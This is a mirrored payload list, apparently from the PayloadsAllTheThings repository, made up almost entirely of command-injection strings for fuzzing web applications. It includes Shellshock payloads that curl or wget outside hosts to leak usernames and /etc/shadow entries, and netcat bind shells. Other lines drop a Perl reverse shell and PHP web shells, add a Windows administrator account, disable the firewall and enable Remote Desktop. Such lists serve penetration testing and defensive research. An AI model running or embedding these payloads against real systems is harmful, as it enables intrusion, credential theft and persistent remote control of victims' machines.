mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
449 lines
20 KiB
Plaintext
449 lines
20 KiB
Plaintext
|
`
|
||
|
||
|
||
|
|
|
||
|
;
|
||
|
'
|
||
|
'"
|
||
|
"
|
||
|
"'
|
||
|
&
|
||
|
&&
|
||
|
%0a
|
||
|
%0a%0d
|
||
|
%0Acat%20/etc/passwd
|
||
|
%0Aid
|
||
|
%0a id %0a
|
||
|
%0Aid%0A
|
||
|
%0a ping -i 30 127.0.0.1 %0a
|
||
|
%0A/usr/bin/id
|
||
|
%0A/usr/bin/id%0A
|
||
|
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
|
||
|
%20{${phpinfo()}}
|
||
|
%20{${sleep(20)}}
|
||
|
%20{${sleep(3)}}
|
||
|
a|id|
|
||
|
a;id|
|
||
|
a;id;
|
||
|
a;id\n
|
||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
|
||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
|
||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
|
||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
|
||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
|
||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
|
||
|
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
|
||
|
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
|
||
|
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
|
||
|
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
|
||
|
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
|
||
|
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
|
||
|
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
|
||
|
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
|
||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
|
||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
|
||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
|
||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
|
||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
|
||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
|
||
|
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
|
||
|
cat /etc/hosts
|
||
|
$(`cat /etc/passwd`)
|
||
|
cat /etc/passwd
|
||
|
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
|
||
|
| curl http://crowdshield.com/.testing/rce.txt
|
||
|
& curl http://crowdshield.com/.testing/rce.txt
|
||
|
; curl https://crowdshield.com/.testing/rce_vuln.txt
|
||
|
&& curl https://crowdshield.com/.testing/rce_vuln.txt
|
||
|
curl https://crowdshield.com/.testing/rce_vuln.txt
|
||
|
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
|
||
|
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
|
||
|
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
|
||
|
dir
|
||
|
| dir
|
||
|
; dir
|
||
|
$(`dir`)
|
||
|
& dir
|
||
|
&&dir
|
||
|
&& dir
|
||
|
| dir C:\
|
||
|
; dir C:\
|
||
|
& dir C:\
|
||
|
&& dir C:\
|
||
|
dir C:\
|
||
|
| dir C:\Documents and Settings\*
|
||
|
; dir C:\Documents and Settings\*
|
||
|
& dir C:\Documents and Settings\*
|
||
|
&& dir C:\Documents and Settings\*
|
||
|
dir C:\Documents and Settings\*
|
||
|
| dir C:\Users
|
||
|
; dir C:\Users
|
||
|
& dir C:\Users
|
||
|
&& dir C:\Users
|
||
|
dir C:\Users
|
||
|
;echo%20'<script>alert(1)</script>'
|
||
|
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
|
||
|
| echo "<?php include($_GET['page'])| ?>" > rfi.php
|
||
|
; echo "<?php include($_GET['page']); ?>" > rfi.php
|
||
|
& echo "<?php include($_GET['page']); ?>" > rfi.php
|
||
|
&& echo "<?php include($_GET['page']); ?>" > rfi.php
|
||
|
echo "<?php include($_GET['page']); ?>" > rfi.php
|
||
|
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
|
||
|
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||
|
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||
|
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||
|
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||
|
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
|
||
|
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||
|
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||
|
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||
|
echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||
|
;echo '<script>alert(1)</script>'
|
||
|
echo '<script>alert(1)</script>'// XXXXXXXXXXX
|
||
|
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
|
||
|
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
|
||
|
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
|
||
|
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
|
||
|
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
|
||
|
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
|
||
|
() { :;}; echo vulnerable 10
|
||
|
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
|
||
|
eval('ls')
|
||
|
eval('pwd')
|
||
|
eval('pwd');
|
||
|
eval('sleep 5')
|
||
|
eval('sleep 5');
|
||
|
eval('whoami')
|
||
|
eval('whoami');
|
||
|
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
|
||
|
exec('ls')
|
||
|
exec('pwd')
|
||
|
exec('pwd');
|
||
|
exec('sleep 5')
|
||
|
exec('sleep 5');
|
||
|
exec('whoami')
|
||
|
exec('whoami');
|
||
|
;{$_GET["cmd"]}
|
||
|
`id`
|
||
|
|id
|
||
|
| id
|
||
|
;id
|
||
|
;id|
|
||
|
;id;
|
||
|
& id
|
||
|
&&id
|
||
|
;id\n
|
||
|
ifconfig
|
||
|
| ifconfig
|
||
|
; ifconfig
|
||
|
& ifconfig
|
||
|
&& ifconfig
|
||
|
/index.html|id|
|
||
|
ipconfig
|
||
|
| ipconfig /all
|
||
|
; ipconfig /all
|
||
|
& ipconfig /all
|
||
|
&& ipconfig /all
|
||
|
ipconfig /all
|
||
|
ls
|
||
|
$(`ls`)
|
||
|
| ls -l /
|
||
|
; ls -l /
|
||
|
& ls -l /
|
||
|
&& ls -l /
|
||
|
ls -l /
|
||
|
| ls -laR /etc
|
||
|
; ls -laR /etc
|
||
|
& ls -laR /etc
|
||
|
&& ls -laR /etc
|
||
|
| ls -laR /var/www
|
||
|
; ls -laR /var/www
|
||
|
& ls -laR /var/www
|
||
|
&& ls -laR /var/www
|
||
|
| ls -l /etc/
|
||
|
; ls -l /etc/
|
||
|
& ls -l /etc/
|
||
|
&& ls -l /etc/
|
||
|
ls -l /etc/
|
||
|
ls -lh /etc/
|
||
|
| ls -l /home/*
|
||
|
; ls -l /home/*
|
||
|
& ls -l /home/*
|
||
|
&& ls -l /home/*
|
||
|
ls -l /home/*
|
||
|
*; ls -lhtR /var/www/
|
||
|
| ls -l /tmp
|
||
|
; ls -l /tmp
|
||
|
& ls -l /tmp
|
||
|
&& ls -l /tmp
|
||
|
ls -l /tmp
|
||
|
| ls -l /var/www/*
|
||
|
; ls -l /var/www/*
|
||
|
& ls -l /var/www/*
|
||
|
&& ls -l /var/www/*
|
||
|
ls -l /var/www/*
|
||
|
<!--#exec cmd="/bin/cat /etc/passwd"-->
|
||
|
<!--#exec cmd="/bin/cat /etc/shadow"-->
|
||
|
<!--#exec cmd="/usr/bin/id;-->
|
||
|
\n
|
||
|
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
|
||
|
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
|
||
|
\n/bin/ls -al\n
|
||
|
| nc -lvvp 4444 -e /bin/sh|
|
||
|
; nc -lvvp 4444 -e /bin/sh;
|
||
|
& nc -lvvp 4444 -e /bin/sh&
|
||
|
&& nc -lvvp 4444 -e /bin/sh &
|
||
|
nc -lvvp 4444 -e /bin/sh
|
||
|
nc -lvvp 4445 -e /bin/sh &
|
||
|
nc -lvvp 4446 -e /bin/sh|
|
||
|
nc -lvvp 4447 -e /bin/sh;
|
||
|
nc -lvvp 4448 -e /bin/sh&
|
||
|
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
|
||
|
\necho INJECTX\nexit\n\033[2Asleep 5\n
|
||
|
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
|
||
|
| net localgroup Administrators hacker /ADD
|
||
|
; net localgroup Administrators hacker /ADD
|
||
|
& net localgroup Administrators hacker /ADD
|
||
|
&& net localgroup Administrators hacker /ADD
|
||
|
net localgroup Administrators hacker /ADD
|
||
|
| netsh firewall set opmode disable
|
||
|
; netsh firewall set opmode disable
|
||
|
& netsh firewall set opmode disable
|
||
|
&& netsh firewall set opmode disable
|
||
|
netsh firewall set opmode disable
|
||
|
netstat
|
||
|
;netstat -a;
|
||
|
| netstat -an
|
||
|
; netstat -an
|
||
|
& netstat -an
|
||
|
&& netstat -an
|
||
|
netstat -an
|
||
|
| net user hacker Password1 /ADD
|
||
|
; net user hacker Password1 /ADD
|
||
|
& net user hacker Password1 /ADD
|
||
|
&& net user hacker Password1 /ADD
|
||
|
net user hacker Password1 /ADD
|
||
|
| net view
|
||
|
; net view
|
||
|
& net view
|
||
|
&& net view
|
||
|
net view
|
||
|
\nid|
|
||
|
\nid;
|
||
|
\nid\n
|
||
|
\n/usr/bin/id\n
|
||
|
perl -e 'print "X"x1024'
|
||
|
|| perl -e 'print "X"x16096'
|
||
|
| perl -e 'print "X"x16096'
|
||
|
; perl -e 'print "X"x16096'
|
||
|
& perl -e 'print "X"x16096'
|
||
|
&& perl -e 'print "X"x16096'
|
||
|
perl -e 'print "X"x16384'
|
||
|
; perl -e 'print "X"x2048'
|
||
|
& perl -e 'print "X"x2048'
|
||
|
&& perl -e 'print "X"x2048'
|
||
|
perl -e 'print "X"x2048'
|
||
|
|| perl -e 'print "X"x4096'
|
||
|
| perl -e 'print "X"x4096'
|
||
|
; perl -e 'print "X"x4096'
|
||
|
& perl -e 'print "X"x4096'
|
||
|
&& perl -e 'print "X"x4096'
|
||
|
perl -e 'print "X"x4096'
|
||
|
|| perl -e 'print "X"x8096'
|
||
|
| perl -e 'print "X"x8096'
|
||
|
; perl -e 'print "X"x8096'
|
||
|
&& perl -e 'print "X"x8096'
|
||
|
perl -e 'print "X"x8192'
|
||
|
perl -e 'print "X"x81920'
|
||
|
|| phpinfo()
|
||
|
| phpinfo()
|
||
|
{${phpinfo()}}
|
||
|
;phpinfo()
|
||
|
;phpinfo();//
|
||
|
';phpinfo();//
|
||
|
{${phpinfo()}}
|
||
|
& phpinfo()
|
||
|
&& phpinfo()
|
||
|
phpinfo()
|
||
|
phpinfo();
|
||
|
<?php system("cat /etc/passwd");?>
|
||
|
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
|
||
|
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
|
||
|
<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
|
||
|
<?php system("sleep 10");?>
|
||
|
<?php system("sleep 5");?>
|
||
|
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
|
||
|
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
|
||
|
:phpversion();
|
||
|
`ping 127.0.0.1`
|
||
|
& ping -i 30 127.0.0.1 &
|
||
|
& ping -n 30 127.0.0.1 &
|
||
|
;${@print(md5(RCEVulnerable))};
|
||
|
${@print("RCEVulnerable")}
|
||
|
${@print(system($_SERVER['HTTP_USER_AGENT']))}
|
||
|
pwd
|
||
|
| pwd
|
||
|
; pwd
|
||
|
& pwd
|
||
|
&& pwd
|
||
|
\r
|
||
|
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||
|
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||
|
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||
|
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||
|
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||
|
\r\n
|
||
|
route
|
||
|
| sleep 1
|
||
|
; sleep 1
|
||
|
& sleep 1
|
||
|
&& sleep 1
|
||
|
sleep 1
|
||
|
|| sleep 10
|
||
|
| sleep 10
|
||
|
; sleep 10
|
||
|
{${sleep(10)}}
|
||
|
& sleep 10
|
||
|
&& sleep 10
|
||
|
sleep 10
|
||
|
|| sleep 15
|
||
|
| sleep 15
|
||
|
; sleep 15
|
||
|
& sleep 15
|
||
|
&& sleep 15
|
||
|
{${sleep(20)}}
|
||
|
{${sleep(20)}}
|
||
|
{${sleep(3)}}
|
||
|
{${sleep(3)}}
|
||
|
| sleep 5
|
||
|
; sleep 5
|
||
|
& sleep 5
|
||
|
&& sleep 5
|
||
|
sleep 5
|
||
|
{${sleep(hexdec(dechex(20)))}}
|
||
|
{${sleep(hexdec(dechex(20)))}}
|
||
|
sysinfo
|
||
|
| sysinfo
|
||
|
; sysinfo
|
||
|
& sysinfo
|
||
|
&& sysinfo
|
||
|
;system('cat%20/etc/passwd')
|
||
|
system('cat C:\boot.ini');
|
||
|
system('cat config.php');
|
||
|
system('cat /etc/passwd');
|
||
|
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||
|
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||
|
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||
|
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||
|
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||
|
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
|
||
|
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
|
||
|
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
|
||
|
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
|
||
|
systeminfo
|
||
|
| systeminfo
|
||
|
; systeminfo
|
||
|
& systeminfo
|
||
|
&& systeminfo
|
||
|
system('ls')
|
||
|
system('pwd')
|
||
|
system('pwd');
|
||
|
|| system('sleep 5');
|
||
|
| system('sleep 5');
|
||
|
; system('sleep 5');
|
||
|
& system('sleep 5');
